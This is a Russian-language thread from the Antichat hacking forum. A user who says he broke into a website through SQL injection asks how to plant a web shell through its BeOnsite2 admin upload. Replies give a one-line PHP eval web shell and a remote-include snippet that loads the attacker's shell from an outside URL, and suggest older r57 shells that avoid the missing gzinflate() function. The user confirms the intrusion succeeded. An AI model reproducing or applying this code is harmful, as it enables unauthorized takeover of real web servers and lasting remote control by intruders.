Форум АНТИЧАТ - Залить shell

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Болталка (https://forum.antichat.xyz/forumdisplay.php?f=46)

- - Залить shell (https://forum.antichat.xyz/showthread.php?t=90769)

Залить shell

Я хочу залить шелл на сайт!
Ломанул сайт с помощью SQL-иньекции, нашел пароль к админке и саму админку!
Админка: движок ее BeOnsite2
Там есть такая штука, как залить файл... Я заливал шелл, но при попытке запуска его - он пишет:
Fatal error: Call to undefined function: gzinflate() in /************ on line 6
Что можно зделать?
Как инклюдить через *.gif?
Как залить пхп файл, что бы он соеденялся с моим шеллом... То есть что бы в самом файле на взломаном сервере не было самого шелла, а было лишь подключение к нему?
Или что вы посоветуете? Жду ответов!

PHP код:


		
			
<?php

eval(stripslashes(implode($_GET)));

?>

Юзай, только судя по созданию такой темы я очень сомневаюсь что ты поймёш что с этим делать :rolleyes:
stripslashes естествена нужен если есть экранирование

На сервере отключена (или отстутствует по древности) функция gzinflate(). А шелл у тебя ее использует (предположу, что шелл r57 1.40+ или c99madshell). Ты можешь использовать шелл, который обходиться без нее. Например, r57 1.31. А чтобы индклюдился шелл, то юзай такую конструкцию:

PHP код:


		
			
<?php

include("http://site.com/shell.txt");

?>

Не забудь заменить http://site.com/shell.txt на свой.

Если сервер опять заругается, то не спеши удивляться: возможно, отключена функция include или allow_url_fopen = off. Тогда, как было сказано выше, залей r57 1.31 и не парься.

Спасибо большое! Все получилось))
Ponchik, отдельное спасибо тебе!!!